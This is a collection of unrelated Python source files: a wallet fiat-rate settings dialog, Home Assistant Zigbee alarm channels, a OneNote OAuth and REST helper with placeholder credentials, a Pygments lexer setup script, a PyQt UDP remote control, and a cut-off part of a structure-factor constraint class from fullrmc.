def __init__(self, app, plugins, config, callback):
self.app = app
self.config = config
self.callback = callback
self.fx = self.app.fx
if self.fx.get_history_config(allow_none=True) is None:
# If nothing is set, force-enable it. (Note that as fiat rates itself
# are disabled by default, it is enough to set this here. If they
# were enabled by default, this would be too late.)
self.fx.set_history_config(True)
self.has_history_rates = self.fx.get_history_config()
Factory.Popup.__init__(self)
self.add_currencies()
def add_exchanges(self):
ex = self.ids.exchanges
if self.fx.is_enabled():
exchanges = sorted(self.fx.get_exchanges_by_ccy(self.fx.get_currency(), self.has_history_rates))
mx = self.fx.exchange.name()
if mx in exchanges:
ex.text = mx
elif exchanges:
ex.text = exchanges[0]
else:
ex.text = ''
else:
exchanges = []
ex.text = ''
ex.values = exchanges
def on_exchange(self, text):
if not text:
return
if self.fx.is_enabled() and text != self.fx.exchange.name():
self.fx.set_exchange(text)
def add_currencies(self):
currencies = [_('None')] + self.fx.get_currencies(self.has_history_rates)
my_ccy = self.fx.get_currency() if self.fx.is_enabled() else _('None')
self.ids.ccy.values = currencies
self.ids.ccy.text = my_ccy
def on_checkbox_history(self, checked):
self.fx.set_history_config(checked)
self.has_history_rates = checked
self.add_currencies()
self.on_currency(self.ids.ccy.text)
def on_currency(self, ccy):
b = (ccy != _('None'))
self.fx.set_enabled(b)
if b:
if ccy != self.fx.get_currency():
self.fx.set_currency(ccy)
self.app.fiat_unit = ccy
else:
self.app.is_fiat = False
Clock.schedule_once(lambda dt: self.add_exchanges())
|
"""
Security channels module for Zigbee Home Automation.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/zha/
"""
import logging
import zigpy.zcl.clusters.security as security
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_send
from . import ZigbeeChannel
from .. import registries
from ..const import (
CLUSTER_COMMAND_SERVER,
SIGNAL_ATTR_UPDATED,
WARNING_DEVICE_MODE_EMERGENCY,
WARNING_DEVICE_SOUND_HIGH,
WARNING_DEVICE_SQUAWK_MODE_ARMED,
WARNING_DEVICE_STROBE_HIGH,
WARNING_DEVICE_STROBE_YES,
)
_LOGGER = logging.getLogger(__name__)
@registries.ZIGBEE_CHANNEL_REGISTRY.register(security.IasAce.cluster_id)
class IasAce(ZigbeeChannel):
"""IAS Ancillary Control Equipment channel."""
pass
@registries.CHANNEL_ONLY_CLUSTERS.register(security.IasWd.cluster_id)
@registries.ZIGBEE_CHANNEL_REGISTRY.register(security.IasWd.cluster_id)
class IasWd(ZigbeeChannel):
"""IAS Warning Device channel."""
@staticmethod
def set_bit(destination_value, destination_bit, source_value, source_bit):
"""Set the specified bit in the value."""
if IasWd.get_bit(source_value, source_bit):
return destination_value | (1 << destination_bit)
return destination_value
@staticmethod
def get_bit(value, bit):
"""Get the specified bit from the value."""
return (value & (1 << bit)) != 0
async def squawk(
self,
mode=WARNING_DEVICE_SQUAWK_MODE_ARMED,
strobe=WARNING_DEVICE_STROBE_YES,
squawk_level=WARNING_DEVICE_SOUND_HIGH,
):
"""Issue a squawk command.
This command uses the WD capabilities to emit a quick audible/visible pulse called a
"squawk". The squawk command has no effect if the WD is currently active
(warning in progress).
"""
value = 0
value = IasWd.set_bit(value, 0, squawk_level, 0)
value = IasWd.set_bit(value, 1, squawk_level, 1)
value = IasWd.set_bit(value, 3, strobe, 0)
value = IasWd.set_bit(value, 4, mode, 0)
value = IasWd.set_bit(value, 5, mode, 1)
value = IasWd.set_bit(value, 6, mode, 2)
value = IasWd.set_bit(value, 7, mode, 3)
await self.device.issue_cluster_command(
self.cluster.endpoint.endpoint_id,
self.cluster.cluster_id,
0x0001,
CLUSTER_COMMAND_SERVER,
[value],
)
async def start_warning(
self,
mode=WARNING_DEVICE_MODE_EMERGENCY,
strobe=WARNING_DEVICE_STROBE_YES,
siren_level=WARNING_DEVICE_SOUND_HIGH,
warning_duration=5, # seconds
strobe_duty_cycle=0x00,
strobe_intensity=WARNING_DEVICE_STROBE_HIGH,
):
"""Issue a start warning command.
This command starts the WD operation. The WD alerts the surrounding area by audible
(siren) and visual (strobe) signals.
strobe_duty_cycle indicates the length of the flash cycle. This provides a means
of varying the flash duration for different alarm types (e.g., fire, police, burglar).
Valid range is 0-100 in increments of 10. All other values SHALL be rounded to the
nearest valid value. Strobe SHALL calculate duty cycle over a duration of one second.
The ON state SHALL precede the OFF state. For example, if Strobe Duty Cycle Field specifies
“40,” then the strobe SHALL flash ON for 4/10ths of a second and then turn OFF for
6/10ths of a second.
"""
value = 0
value = IasWd.set_bit(value, 0, siren_level, 0)
value = IasWd.set_bit(value, 1, siren_level, 1)
value = IasWd.set_bit(value, 2, strobe, 0)
value = IasWd.set_bit(value, 4, mode, 0)
value = IasWd.set_bit(value, 5, mode, 1)
value = IasWd.set_bit(value, 6, mode, 2)
value = IasWd.set_bit(value, 7, mode, 3)
await self.device.issue_cluster_command(
self.cluster.endpoint.endpoint_id,
self.cluster.cluster_id,
0x0000,
CLUSTER_COMMAND_SERVER,
[value, warning_duration, strobe_duty_cycle, strobe_intensity],
)
@registries.BINARY_SENSOR_CLUSTERS.register(security.IasZone.cluster_id)
@registries.ZIGBEE_CHANNEL_REGISTRY.register(security.IasZone.cluster_id)
class IASZoneChannel(ZigbeeChannel):
"""Channel for the IASZone Zigbee cluster."""
@callback
def cluster_command(self, tsn, command_id, args):
"""Handle commands received to this cluster."""
if command_id == 0:
state = args[0] & 3
async_dispatcher_send(
self._zha_device.hass, f"{self.unique_id}_{SIGNAL_ATTR_UPDATED}", state
)
self.debug("Updated alarm state: %s", state)
elif command_id == 1:
self.debug("Enroll requested")
res = self._cluster.enroll_response(0, 0)
self._zha_device.hass.async_create_task(res)
async def async_configure(self):
"""Configure IAS device."""
# Xiaomi devices don't need this and it disrupts pairing
if self._zha_device.manufacturer == "LUMI":
self.debug("finished IASZoneChannel configuration")
return
from zigpy.exceptions import DeliveryError
self.debug("started IASZoneChannel configuration")
await self.bind()
ieee = self.cluster.endpoint.device.application.ieee
try:
res = await self._cluster.write_attributes({"cie_addr": ieee})
self.debug(
"wrote cie_addr: %s to '%s' cluster: %s",
str(ieee),
self._cluster.ep_attribute,
res[0],
)
except DeliveryError as ex:
self.debug(
"Failed to write cie_addr: %s to '%s' cluster: %s",
str(ieee),
self._cluster.ep_attribute,
str(ex),
)
self.debug("finished IASZoneChannel configuration")
await self.get_attribute_value("zone_type", from_cache=False)
@callback
def attribute_updated(self, attrid, value):
"""Handle attribute updates on this cluster."""
if attrid == 2:
value = value & 3
async_dispatcher_send(
self._zha_device.hass, f"{self.unique_id}_{SIGNAL_ATTR_UPDATED}", value
)
async def async_initialize(self, from_cache):
"""Initialize channel."""
await self.get_attribute_value("zone_status", from_cache=from_cache)
await self.get_attribute_value("zone_state", from_cache=from_cache)
await super().async_initialize(from_cache)
|
"""
PyOneNote.py
~~~~~~~~~~~~~~~~~
This module contains a basic OAuth 2 Authentication and basic handler for GET and POST operations.
This work was just a quick hack to migrate notes from and old database to onenote but should hep you to understand
the request structure of OneNote.
Copyright (c) 2016 Coffeemug13. All rights reserved. Licensed under the MIT license.
See LICENSE in the project root for license information.
"""
import requests
class OAuth():
"""Handles the authentication for all requests"""
def __init__(self, client_id, client_secret, code=None, token=None, refresh_token=None):
""" This information is obtained upon registration of a new Outlook Application
The values are just for information and not valid
:param client_id: "cda3ffaa-2345-a122-3454-adadc556e7bf"
:param client_secret: "AABfsafd6Q5d1VZmJQNsdac"
:param code: = "AcD5bcf9a-0fef-ca3a-1a3a-9v4543388572"
:param token: = "EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW......"
:param rtoken: = "MCKKgf55PCiM2aACbIYads*sdsa%*PWYNj436348v......" """
self.client_id = client_id
self.client_secret = client_secret
self.code = code
self.token = token
self.rtoken = refresh_token
self.redirect_uri = 'https://localhost'
self.session = requests.Session()
@staticmethod
def get_authorize_url(client_id):
"open this url in a browser to let the user grant access to onenote. Extract from the return URL your access code"
url = "https://login.live.com/oauth20_authorize.srf?client_id={0}&scope=wl.signin%20wl.offline_access%20wl.basic%20office.onenote_create&response_type=code&redirect_uri=https://localhost".format(
client_id)
return url
def get_token(self):
"""
Make the following request with e.g. postman:
POST https://login.live.com/oauth20_token.srf
Content-Type:application/x-www-form-urlencoded
grant_type:authorization_code
client_id:cda3ffaa-2345-a122-3454-adadc556e7bf
client_secret:AABfsafd6Q5d1VZmJQNsdac
code:111111111-1111-1111-1111-111111111111
redirect_uri:https://localhost
OneNote will return as result:
{
"token_type": "bearer",
"expires_in": 3600,
"scope": "wl.signin wl.offline_access wl.basic office.onenote_create office.onenote",
"access_token": "AxxdWR1DBAAUGCCXc8wU/....",
"refresh_token": "DR3DDEQJPCiM2aACbIYa....",
"user_id": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}
"""
raise NotImplementedError("")
def refresh_token(self):
"""
Make the following reqest to refresh you token with e.g. postman:
POST https://login.live.com/oauth20_token.srf
Content-Type:application/x-www-form-urlencoded
grant_type:refresh_token
client_id:cda3ffaa-2345-a122-3454-adadc556e7bf
client_secret:AABfsafd6Q5d1VZmJQNsdac
refresh_token:DR3DDEQJPCiM2aACbIYa....
redirect_uri:https://localhost
-->
{
"token_type": "bearer",
"expires_in": 3600,
"scope": "wl.signin wl.offline_access wl.basic office.onenote_create office.onenote",
"access_token": "EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW...",
"refresh_token": "DSFDSGSGFABDBGFGBFGF5435kFGDd2J6Bco2Pv2ss...",
"user_id": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}
"""
url = 'https://login.live.com/oauth20_token.srf'
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"grant_type": "refresh_token",
"client_id": self.client_id,
"client_secret": self.client_secret,
"refresh_token": self.rtoken,
"redirect_uri": self.redirect_uri}
result = self.session.post(url, headers=headers, data=data)
print("Refreshed token: " + result.text)
refresh = result.json()
self.expire = refresh.get('expires_in')
self.token = refresh.get('access_token')
self.rtoken = refresh.get('refresh_token')
print("Token: " + self.token)
print("Refresh Token: " + self.rtoken)
return True
def _get(self, url, query):
"""Handles GET Request with Authentication"""
headers = {'user-agent': 'my-app/0.0.1', 'Authorization': 'Bearer ' + self.token}
result = self.session.get(url, headers=headers, params=query)
print("GET " + result.url)
print(result.headers)
if (result.text):
print(result.text)
return result
def _post(self, url: str, headers: list, data: str = None, files: list = None):
"""Handles POST Request with Authentication"""
newHeaders = {'user-agent': 'my-app/0.0.1', 'Authorization': 'Bearer ' + self.token}
if data:
newHeaders.update(headers)
result = self.session.post(url, headers=newHeaders, data=data)
else:
result = self.session.post(url, headers=newHeaders, files=files)
# result.request.headers
print("POST " + result.url)
print(result.headers)
if (result.text):
print(result.text)
return result
def post(self, url: str, headers: list, data: str = None, files: list = None):
"""post something and handle token expire transparent to the caller"""
try:
result = self._post(url, headers, data=data, files=files)
if (result.status_code not in (200, 201)):
print("Error: " + str(result.status_code))
if (result.status_code == 401):
print("Refreshing token")
if self.refresh_token():
result = self._post(url, headers, data, files=files)
else:
print('Failed retry refreshing token')
return result
except Exception as e:
print(e)
pass
def get(self, url, query, headers=None):
"""get something and handle token expire transparent to the caller"""
try:
result = self._get(url, query)
if (result.status_code != requests.codes.ok):
print("Error: " + str(result.status_code))
if (result.status_code == 401):
print("Refreshing token")
if self.refresh_token():
result = self._get(url, query)
else:
print('Failed retry refreshing token')
return result
except Exception as e:
print(e)
pass
def get_credentials(self):
"""Return the actual credentials of this OAuth Instance
:return client_id:"""
return self.client_id, self.client_secret, self.code, self.token, self.rtoken
class OneNote(OAuth):
"""This class wraps some OneNote specific calls"""
def __init__(self, client_id, client_secret, code, token, rtoken):
super().__init__(client_id, client_secret, code, token, rtoken)
self.base = "https://www.onenote.com/api/v1.0/me/"
def list_notebooks(self):
url = self.base + "notes/notebooks"
query = {'top': '5'}
result = self.get(url, query)
n = None
if (result):
notebooks = result.json()
# result_serialized = json.dumps(result.text)
# notebook = json.loads(result_serialized)
n = notebooks["value"][0]
x = 1
return n
def post_page(self, section_id: str, created, title: str, content: str, files: list = None):
"""post a page. If you want to provide additional images to the page provide them as file list
in the same way like posting multipart message in 'requests'
.:param content: valid html text with Umlaute converted to ä"""
url = self.base + "notes/sections/" + section_id + "/pages"
headers = {"Content-Type": "application/xhtml+xml"}
# the basic layout of a page is always same
data = """<?xml version="1.0" encoding="utf-8" ?>
<html>
<head>
<title>{0}</title>
<meta name="created" content="{1}"/>
</head>
<body data-absolute-enabled="true">
<div>
{2}
</div>
</body>
</html>
""".format(title, created, content)
result = None
if files:
"post as multipart"
newFiles = [('Presentation', (None, data, 'application/xhtml+xml', {'Content-Encoding': 'utf8'}))]
newFiles.extend(files)
result = self.post(url, {}, None, files=newFiles)
else:
"post as simple request"
result = self.post(url, headers, data)
n = None
if (result):
notebooks = result.json()
# result_serialized = json.dumps(result.text)
# notebook = json.loads(result_serialized)
# n = notebooks["value"][0]
x = 1
return notebooks
|
"""pygments-sisal module setup script for distribution."""
from __future__ import with_statement
import os
import setuptools
def get_version(filename):
with open(filename) as fh:
for line in fh:
if line.startswith('__version__'):
return line.split('=')[-1].strip()[1:-1]
setuptools.setup(
name='pygments-sisal',
version=get_version(os.path.join('pygments_sisal', '__init__.py')),
author='Alexander Asp Bock',
author_email='[email protected]',
platforms='All',
description=('A pygments lexer for SISAL'),
install_requires=['Pygments>=2.0'],
license='MIT',
keywords='pygments, lexer, sisal',
url='https://github.com/MisanthropicBit/pygments-sisal',
packages=setuptools.find_packages(),
long_description=open('README.md').read(),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Utilities',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5'
],
# Pygments entry point
entry_points="[pygments.lexers]\n"
"sisal=pygments_sisal:SisalLexer"
)
|
import sys
from PyQt4 import QtGui, QtCore
import time, socket, json
from main import Ui_MainWindow
s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
IP = "localhost"
PORT = 8001
class main_menu(QtGui.QMainWindow):
def __init__(self):
super(main_menu, self).__init__()
self.ui=Ui_MainWindow()
self.ui.setupUi(self)
self.show()
def keyPressEvent(self, event1):
verbose = {"FB":"", "LR":""}
if event1.key() == QtCore.Qt.Key_W:
#print "Up pressed"
verbose["FB"] = "F"
if event1.key() == QtCore.Qt.Key_S:
#print "D pressed"
verbose["FB"] = "B"
if event1.key() == QtCore.Qt.Key_A:
#print "L pressed"
verbose["LR"] = "L"
if event1.key() == QtCore.Qt.Key_D:
#print "R pressed"
verbose["LR"] = "R"
print verbose
json_data=json.dumps(verbose)
s.sendto((json_data), (IP, PORT))
def keyReleaseEvent(self, event):
verbose = {"FB":"", "LR":""}
if event.key() == QtCore.Qt.Key_W:
#print "Up rel"
verbose["FB"] = "S"
if event.key() == QtCore.Qt.Key_S:
#print "D rel"
verbose["FB"] = "S"
if event.key() == QtCore.Qt.Key_A:
#print "L pressed"
verbose["LR"] = "S"
if event.key() == QtCore.Qt.Key_D:
#print "R pressed"
verbose["LR"] = "S"
print verbose
json_data=json.dumps(verbose)
s.sendto((json_data), (IP, PORT))
def main():
app = QtGui.QApplication(sys.argv)
ex = main_menu()
app.exec_()
if __name__ == '__main__':
main()
|
"""
StructureFactorConstraints contains classes for all constraints related experimental static structure factor functions.
.. inheritance-diagram:: fullrmc.Constraints.StructureFactorConstraints
:parts: 1
"""
# standard libraries imports
from __future__ import print_function
import itertools, re
# external libraries imports
import numpy as np
from pdbparser.Utilities.Database import is_element_property, get_element_property
from pdbparser.Utilities.Collection import get_normalized_weighting
# fullrmc imports
from ..Globals import INT_TYPE, FLOAT_TYPE, PI, PRECISION, LOGGER
from ..Globals import str, long, unicode, bytes, basestring, range, xrange, maxint
from ..Core.Collection import is_number, is_integer, get_path
from ..Core.Collection import reset_if_collected_out_of_date, get_real_elements_weight
from ..Core.Collection import get_caller_frames
from ..Core.Constraint import Constraint, ExperimentalConstraint
from ..Core.pairs_histograms import multiple_pairs_histograms_coords, full_pairs_histograms_coords
class StructureFactorConstraint(ExperimentalConstraint):
"""
Controls the Structure Factor noted as S(Q) and also called
total-scattering structure function or Static Structure Factor.
S(Q) is a dimensionless quantity and normalized such as the average
value :math:`<S(Q)>=1`.
It is worth mentioning that S(Q) is nothing other than the normalized and
corrected diffraction pattern if all experimental artefacts powder.
The computation of S(Q) is done through an inverse Sine Fourier transform
of the computed pair distribution function G(r).
.. math::
S(Q) = 1+ \\frac{1}{Q} \\int_{0}^{\\infty} G(r) sin(Qr) dr
From an atomistic model and histogram point of view, G(r) is computed as
the following:
.. math::
G(r) = 4 \\pi r (\\rho_{r} - \\rho_{0})
= 4 \\pi \\rho_{0} r (g(r)-1)
= \\frac{R(r)}{r} - 4 \\pi \\rho_{0}
g(r) is calculated after binning all pair atomic distances into a
weighted histograms as the following:
.. math::
g(r) = \\sum \\limits_{i,j}^{N} w_{i,j} \\frac{\\rho_{i,j}(r)}{\\rho_{0}}
= \\sum \\limits_{i,j}^{N} w_{i,j} \\frac{n_{i,j}(r) / v(r)}{N_{i,j} / V}
Where:\n
:math:`Q` is the momentum transfer. \n
:math:`r` is the distance between two atoms. \n
:math:`\\rho_{i,j}(r)` is the pair density function of atoms i and j. \n
:math:`\\rho_{0}` is the average number density of the system. \n
:math:`w_{i,j}` is the relative weighting of atom types i and j. \n
:math:`R(r)` is the radial distribution function (rdf). \n
:math:`N` is the total number of atoms. \n
:math:`V` is the volume of the system. \n
:math:`n_{i,j}(r)` is the number of atoms i neighbouring j at a distance r. \n
:math:`v(r)` is the annulus volume at distance r and of thickness dr. \n
:math:`N_{i,j}` is the total number of atoms i and j in the system. \n
+----------------------------------------------------------------------+
|.. figure:: reduced_structure_factor_constraint_plot_method.png |
| :width: 530px |
| :height: 400px |
| :align: left |
| |
| Reduced structure factor of memory shape Nickel-Titanium alloy. |
+----------------------------------------------------------------------+
:Parameters:
#. experimentalData (numpy.ndarray, string): Experimental data as
numpy.ndarray or string path to load data using numpy.loadtxt
method.
#. dataWeights (None, numpy.ndarray): Weights array of the same number
of points of experimentalData used in the constraint's standard
error computation. Therefore particular fitting emphasis can be
put on different data points that might be considered as more or less
important in order to get a reasonable and plausible modal.\n
If None is given, all data points are considered of the same
importance in the computation of the constraint's standard error.\n
If numpy.ndarray is given, all weights must be positive and all
zeros weighted data points won't contribute to the total
constraint's standard error. At least a single weight point is
required to be non-zeros and the weights array will be automatically
scaled upon setting such as the the sum of all the weights
is equal to the number of data points.
#. weighting (string): The elements weighting scheme. It must be any
atomic attribute (atomicNumber, neutronCohb, neutronIncohb,
neutronCohXs, neutronIncohXs, atomicWeight, covalentRadius) defined
in pdbparser database. In case of xrays or neutrons experimental
weights, one can simply set weighting to 'xrays' or 'neutrons'
and the value will be automatically adjusted to respectively
'atomicNumber' and 'neutronCohb'. If attribute values are
missing in the pdbparser database, atomic weights must be
given in atomsWeight dictionary argument.
#. atomsWeight (None, dict): Atoms weight dictionary where keys are
atoms element and values are custom weights. If None is given
or partially given, missing elements weighting will be fully set
given weighting scheme.
#. rmin (None, number): The minimum distance value to compute G(r)
histogram. If None is given, rmin is computed as
:math:`2 \\pi / Q_{max}`.
#. rmax (None, number): The maximum distance value to compute G(r)
histogram. If None is given, rmax is computed as
:math:`2 \\pi / dQ`.
#. dr (None, number): The distance bin value to compute G(r)
histogram. If None is given, bin is computed as
:math:`2 \\pi / (Q_{max}-Q_{min})`.
#. scaleFactor (number): A normalization scale factor used to normalize
the computed data to the experimental ones.
#. adjustScaleFactor (list, tuple): Used to adjust fit or guess
the best scale factor during stochastic engine runtime.
It must be a list of exactly three entries.\n
#. The frequency in number of generated moves of finding the best
scale factor. If 0 frequency is given, it means that the scale
factor is fixed.
#. The minimum allowed scale factor value.
#. The maximum allowed scale factor value.
#. windowFunction (None, numpy.ndarray): The window function to
convolute with the computed pair distribution function of the
system prior to comparing it with the experimental data. In
general, the experimental pair distribution function G(r) shows
artificial wrinkles, among others the main reason is because
G(r) is computed by applying a sine Fourier transform to the
experimental structure factor S(q). Therefore window function is
used to best imitate the numerical artefacts in the experimental
data.
#. limits (None, tuple, list): The distance limits to compute the
histograms. If None is given, the limits will be automatically
set the the min and max distance of the experimental data.
Otherwise, a tuple of exactly two items where the first is the
minimum distance or None and the second is the maximum distance
or None.
**NB**: If adjustScaleFactor first item (frequency) is 0, the scale factor
will remain untouched and the limits minimum and maximum won't be checked.
.. code-block:: python
# import fullrmc modules
from fullrmc.Engine import Engine
from fullrmc.Constraints.StructureFactorConstraints import StructureFactorConstraint
# create engine
ENGINE = Engine(path='my_engine.rmc')
# set pdb file
ENGINE.set_pdb('system.pdb')
# create and add constraint
SFC = StructureFactorConstraint(experimentalData="sq.dat", weighting="atomicNumber")
ENGINE.add_constraints(SFC)
"""
def __init__(self, experimentalData, dataWeights=None,
weighting="atomicNumber", atomsWeight=None,
rmin=None, rmax=None, dr=None,
scaleFactor=1.0, adjustScaleFactor=(0, 0.8, 1.2),
windowFunction=None, limits=None):
# initialize variables
self.__experimentalQValues = None
self.__experimentalSF = None
self.__rmin = None
self.__rmax = None
self.__dr = None
self.__minimumDistance = None
self.__maximumDistance = None
self.__bin = None
self.__shellCenters = None
self.__histogramSize = None
self.__shellVolumes = None
self.__Gr2SqMatrix = None
# initialize constraint
super(StructureFactorConstraint, self).__init__( experimentalData=experimentalData, dataWeights=dataWeights, scaleFactor=scaleFactor, adjustScaleFactor=adjustScaleFactor)
# set atomsWeight
self.set_atoms_weight(atomsWeight)
# set elements weighting
self.set_weighting(weighting)
self.__set_weighting_scheme()
# set window function
self.set_window_function(windowFunction)
# set r parameters
self.set_rmin(rmin)
self.set_rmax(rmax)
self.set_dr(dr)
# set frame data
FRAME_DATA = [d for d in self.FRAME_DATA]
FRAME_DATA.extend(['_StructureFactorConstraint__experimentalQValues',
'_StructureFactorConstraint__experimentalSF',
'_StructureFactorConstraint__elementsPairs',
'_StructureFactorConstraint__weightingScheme',
'_StructureFactorConstraint__atomsWeight',
'_StructureFactorConstraint__qmin',
'_StructureFactorConstraint__qmax',
'_StructureFactorConstraint__rmin',
'_StructureFactorConstraint__rmax',
'_StructureFactorConstraint__dr',
'_StructureFactorConstraint__minimumDistance',
'_StructureFactorConstraint__maximumDistance',
'_StructureFactorConstraint__bin',
'_StructureFactorConstraint__shellCenters',
'_StructureFactorConstraint__histogramSize',
'_StructureFactorConstraint__shellVolumes',
'_StructureFactorConstraint__Gr2SqMatrix',
'_StructureFactorConstraint__windowFunction',
'_elementsWeight',] )
RUNTIME_DATA = [d for d in self.RUNTIME_DATA]
RUNTIME_DATA.extend( [] )
object.__setattr__(self, 'FRAME_DATA', tuple(FRAME_DATA) )
object.__setattr__(self, 'RUNTIME_DATA', tuple(RUNTIME_DATA) )
def _codify_update__(self, name='constraint', addDependencies=True):
dependencies = []
code = []
if addDependencies:
code.extend(dependencies)
dw = self.dataWeights
if dw is not None:
dw = list(dw)
code.append("dw = {dw}".format(dw=dw))
wf = self.windowFunction
if isinstance(wf, np.ndarray):
code.append("wf = np.array({wf})".format(wf=list(wf)))
else:
code.append("wf = {wf}".format(wf=wf))
code.append("{name}.set_used({val})".format(name=name, val=self.used))
code.append("{name}.set_scale_factor({val})".format(name=name, val=self.scaleFactor))
code.append("{name}.set_adjust_scale_factor({val})".format(name=name, val=self.adjustScaleFactor))
code.append("{name}.set_data_weights(dw)".format(name=name))
code.append("{name}.set_atoms_weight({val})".format(name=name, val=self.atomsWeight))
code.append("{name}.set_window_function(wf)".format(name=name))
code.append("{name}.set_rmin({val})".format(name=name, val=self.rmin))
code.append("{name}.set_rmax({val})".format(name=name, val=self.rmax))
code.append("{name}.set_dr({val})".format(name=name, val=self.dr))
code.append("{name}.set_limits({val})".format(name=name, val=self.limits))
# return
return dependencies, '\n'.join(code)
def _codify__(self, engine, name='constraint', addDependencies=True):
assert isinstance(name, basestring), LOGGER.error("name must be a string")
assert re.match('[a-zA-Z_][a-zA-Z0-9_]*$', name) is not None, LOGGER.error("given name '%s' can't be used as a variable name"%name)
klass = self.__class__.__name__
dependencies = ['import numpy as np','from fullrmc.Constraints import StructureFactorConstraints']
code = []
if addDependencies:
code.extend(dependencies)
x = list(self.experimentalData[:,0])
y = list(self.experimentalData[:,1])
code.append("x = {x}".format(x=x))
code.append("y = {y}".format(y=y))
code.append("d = np.transpose([x,y]).astype(np.float32)")
dw = self.dataWeights
if dw is not None:
dw = list(dw)
code.append("dw = {dw}".format(dw=dw))
wf = self.windowFunction
if isinstance(wf, np.ndarray):
code.append("wf = np.array({wf})".format(wf=list(wf)))
else:
code.append("wf = {wf}".format(wf=wf))
code.append("{name} = {klass}s.{klass}\
(experimentalData=d, dataWeights=dw, weighting='{weighting}', atomsWeight={atomsWeight}, \
rmin={rmin}, rmax={rmax}, dr={dr}, scaleFactor={scaleFactor}, adjustScaleFactor={adjustScaleFactor}, \
shapeFuncParams=sfp, windowFunction=wf, limits={limits})".format(name=name, klass=klass,
weighting=self.weighting, atomsWeight=self.atomsWeight, rmin=self.rmin,
rmax=self.rmax, dr=self.dr, scaleFactor=self.scaleFactor,
adjustScaleFactor=self.adjustScaleFactor, limits=self.limits))
code.append("{engine}.add_constraints([{name}])".format(engine=engine, name=name))
# return
return dependencies, '\n'.join(code)
#def __getstate__(self):
# # make sure that __Gr2SqMatrix is not pickled but saved to the disk as None
# state = super(StructureFactorConstraint, self).__getstate__()
# state["_StructureFactorConstraint__Gr2SqMatrix"] = None
# return state
#
#def __setstate__(self, state):
# # make sure to regenerate G(r) to S(q) matrix at loading time
# self.__dict__.update( state )
# self.__set_Gr_2_Sq_matrix()
#
def __set_Gr_2_Sq_matrix(self):
if self.__experimentalQValues is None or self.__shellCenters is None:
self.__Gr2SqMatrix = None
else:
Qs = self.__experimentalQValues
Rs = self.__shellCenters
dr = self.__shellCenters[1]-self.__shellCenters[0]
qr = Rs.reshape((-1,1))*(np.ones((len(Rs),1), dtype=FLOAT_TYPE)*Qs)
sinqr = np.sin(qr)
sinqr_q = sinqr/Qs
self.__Gr2SqMatrix = dr*sinqr_q
def __set_weighting_scheme(self):
if self.engine is not None:
self.__elementsPairs = sorted(itertools.combinations_with_replacement(self.engine.elements,2))
#elementsWeight = dict([(el,float(get_element_property(el,self.__weighting))) for el in self.engine.elements])
#self._elementsWeight = dict([(el,self.__atomsWeight.get(el, float(get_element_property(el,self.__weighting)))) for el in self.engine.elements])
self._elementsWeight = get_real_elements_weight(elements=self.engine.elements, weightsDict=self.__atomsWeight, weighting=self.__weighting)
self.__weightingScheme = get_normalized_weighting(numbers=self.engine.numberOfAtomsPerElement, weights=self._elementsWeight)
for k in self.__weightingScheme:
self.__weightingScheme[k] = FLOAT_TYPE(self.__weightingScheme[k])
else:
self.__elementsPairs = None
self.__weightingScheme = None
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__elementsPairs' : self.__elementsPairs,
'_StructureFactorConstraint__weightingScheme': self.__weightingScheme})
def __set_histogram(self):
if self.__minimumDistance is None or self.__maximumDistance is None or self.__bin is None:
self.__shellCenters = None
self.__histogramSize = None
self.__shellVolumes = None
else:
# compute edges
if self.engine is not None and self.rmax is None:
minHalfBox = np.min( [np.linalg.norm(v)/2. for v in self.engine.basisVectors])
self.__edges = np.arange(self.__minimumDistance,minHalfBox, self.__bin).astype(FLOAT_TYPE)
else:
self.__edges = np.arange(self.__minimumDistance, self.__maximumDistance+self.__bin, self.__bin).astype(FLOAT_TYPE)
# adjust rmin and rmax
self.__minimumDistance = self.__edges[0]
self.__maximumDistance = self.__edges[-1]
# compute shellCenters
self.__shellCenters = (self.__edges[0:-1]+self.__edges[1:])/FLOAT_TYPE(2.)
# set histogram size
self.__histogramSize = INT_TYPE( len(self.__edges)-1 )
# set shell centers and volumes
self.__shellVolumes = FLOAT_TYPE(4.0/3.)*PI*((self.__edges[1:])**3 - self.__edges[0:-1]**3)
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__minimumDistance': self.__minimumDistance,
'_StructureFactorConstraint__maximumDistance': self.__maximumDistance,
'_StructureFactorConstraint__shellCenters' : self.__shellCenters,
'_StructureFactorConstraint__histogramSize' : self.__histogramSize,
'_StructureFactorConstraint__shellVolumes' : self.__shellVolumes})
# reset constraint
self.reset_constraint()
# reset sq matrix
self.__set_Gr_2_Sq_matrix()
def _on_collector_reset(self):
pass
@property
def rmin(self):
""" Histogram minimum distance. """
return self.__rmin
@property
def rmax(self):
""" Histogram maximum distance. """
return self.__rmax
@property
def dr(self):
""" Histogram bin size."""
return self.__dr
@property
def bin(self):
""" Computed histogram distance bin size."""
return self.__bin
@property
def minimumDistance(self):
""" Computed histogram minimum distance. """
return self.__minimumDistance
@property
def maximumDistance(self):
""" Computed histogram maximum distance. """
return self.__maximumDistance
@property
def qmin(self):
""" Experimental data reciprocal distances minimum. """
return self.__qmin
@property
def qmax(self):
""" Experimental data reciprocal distances maximum. """
return self.__qmax
@property
def dq(self):
""" Experimental data reciprocal distances bin size. """
return self.__experimentalQValues[1]-self.__experimentalQValues[0]
@property
def experimentalQValues(self):
""" Experimental data used q values. """
return self.__experimentalQValues
@property
def histogramSize(self):
""" Histogram size"""
return self.__histogramSize
@property
def shellCenters(self):
""" Shells center array"""
return self.__shellCenters
@property
def shellVolumes(self):
""" Shells volume array"""
return self.__shellVolumes
@property
def experimentalSF(self):
""" Experimental Structure Factor or S(q)"""
return self.__experimentalSF
@property
